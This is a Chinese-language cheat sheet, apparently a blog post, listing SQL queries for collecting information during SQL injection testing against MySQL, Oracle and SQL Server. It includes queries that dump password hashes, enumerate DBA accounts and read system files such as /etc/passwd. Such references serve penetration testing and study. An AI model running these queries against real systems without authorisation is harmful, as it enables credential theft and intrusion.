通常,收集有关渗透测试环境的数据库信息很有参考价值;,如:版本号,用户帐户和数据库都有助于发现漏洞和提升权限。下面是一些SQL注入种信息收集的常见方法。
*需要特权用户
MySQL
| 描述 | 语句 |
|---|---|
| 版本 | SELECT @@version |
| 单个用户 | SELECT user() SELECT system_user() |
| 所有用户 | SELECT user FROM mysql.user* SELECT Super_priv FROM mysql.user WHERE user= ‘root’ LIMIT 1,1 |
| 表 | SELECT table_schema, table_name FROM information_schema.tables |
| 列 | SELECT table_name, column_name FROM information_schema.columns |
| 数据库 | SELECT schema_name FROM information_schema.schemata |
| 当前数据库名称 | SELECT database() |
| 查询其他数据库 | USE [database_name]; SELECT database(); SELECT [column] FROM [database_name].[table_name] |
| 列数 | SELECT count(*) FROM information_schema.columns WHERE table_name = ‘[table_name]’ |
| DBA账户 | SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’ |
| 密码哈希 | SELECT host, user, password FROM mysql.user |
| Schema | SELECT schema() |
| 数据路径 | SELECT @@datadir |
| 读取文件 | * SELECT LOAD_FILE(‘/etc/passwd’) |
Oracle
| 描述 | 语句 |
|---|---|
| 版本 | SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’; SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’; SELECT version FROM v$instance; |
| 单个用户 | SELECT user FROM dual |
| 所有用户 | SELECT username FROM all_users ORDER BY username;* SELECT name FROM sys.user$; |
| 表 | SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables; |
| 通过列名称获取表 | SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; |
| 列 | SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’; SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’; |
| 当前数据库名称 | SELECT global_name FROM global_name; SELECT name FROM V$DATABASE; SELECT instance_name FROM V$INSTANCE; SELECT SYS.DATABASE_NAME FROM DUAL; |
| 数据库 | SELECT DISTINCT owner FROM all_tables; |
| DBA 账户 | SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; |
| 特权 | SELECT * FROM session_privs;(Retrieves Current Privs)* SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’;* SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’;SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS; |
| DB文件的位置 | SELECT name FROM V$DATAFILE; |
| 主机名,IP地址 | SELECT UTL_INADDR.get_host_name FROM dual; SELECT host_name FROM v$instance; SELECT UTL_INADDR.get_host_address FROM dual; (IP地址) SELECT UTL_INADDR.get_host_name(‘10.0.0.1’) FROM dual; (主机名) |
SQL Server
| 描述 | 语句 |
|---|---|
| 版本 | SELECT @@version; |
| 单个用户 | SELECT user; SELECT system_user; SELECT user_name(); SELECT loginame from master..sysprocesses where spid = @@SPID |
| 所有用户 | SELECT name from master..syslogins |
| 表 | SELECT table_catalog, table_name FROM information_schema.columns |
| 列 | SELECT table_catalog, column_name FROM information_schema.columns |
| 所有数据库 | SELECT name from master..sysdatabases; |
| 当前数据库 | SELECT db_name(); |
| 服务器名称 | SELECT @@SERVERNAME |
| 查找存储过程 | SELECT * from master..sysobjects where name like ‘sp%’ order by name desc |
| 通过用户名获取SUID | SELECT SUSER_ID(‘sa’) |
| 通过SUID获取用户名 | SELECT SUSER_NAME(1) |
| 检查账户是不是管理员 | IS_SRVROLEMEMBER(convert(varchar,0x73797361646D696E)) SELECT is_srvrolemember(‘sysadmin’); |
| Policies | SELECT p.policy_id, p.name as [PolicyName], p.condition_id, c.name as [ConditionName], c.facet, c.expression as [ConditionExpression], p.root_condition_id, p.is_enabled, p.date_created, p.date_modified, p.description, p.created_by, p.is_system, t.target_set_id, t.TYPE, t.type_skeleton FROM msdb.dbo.syspolicy_policies p INNER JOIN syspolicy_conditions c ON p.condition_id = c.condition_id INNER JOIN msdb.dbo.syspolicy_target_sets t ON t.object_set_id = p.object_set_id |
| 域用户 | https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/templates/tsql/Get-SQLDomainUser-Example.sql |
| DB 审计 | SELECT a.audit_id, a.name as audit_name, s.name as database_specification_name, d.audit_action_name, d.major_id, OBJECT_NAME(d.major_id) as object, s.is_state_enabled, d.is_group, s.create_date, s.modify_date, d.audited_result FROM sys.server_audits AS a JOIN sys.database_audit_specifications AS s ON a.audit_guid = s.audit_guid JOIN sys.database_audit_specification_details AS d ON s.database_specification_id = d.database_specification_id |
| Server 审计 | SELECT audit_id, a.name as audit_name, s.name as server_specification_name, d.audit_action_name, s.is_state_enabled, d.is_group, d.audit_action_id, s.create_date, s.modify_date FROM sys.server_audits AS a JOIN sys.server_audit_specifications AS s ON a.audit_guid = s.audit_guid JOIN sys.server_audit_specification_details AS d ON s.server_specification_id = d.server_specification_id |
| 查询历史记录 | SELECT * FROM (SELECT COALESCE(OBJECT_NAME(qt.objectid),'Ad-Hoc') AS objectname, qt.objectid as objectid, last_execution_time, execution_count, encrypted,(SELECT TOP 1 SUBSTRING(qt.TEXT,statement_start_offset / 2+1,( (CASE WHEN statement_end_offset = -1 THEN (LEN(CONVERT(NVARCHAR(MAX),qt.TEXT)) * 2) ELSE statement_end_offset END)- statement_start_offset) / 2+1)) AS sql_statement FROM sys.dm_exec_query_stats AS qs CROSS APPLY sys.dm_exec_sql_text(sql_handle) AS qt ) x ORDER BY execution_count DESC |
文章最后更新于 2021-09-22
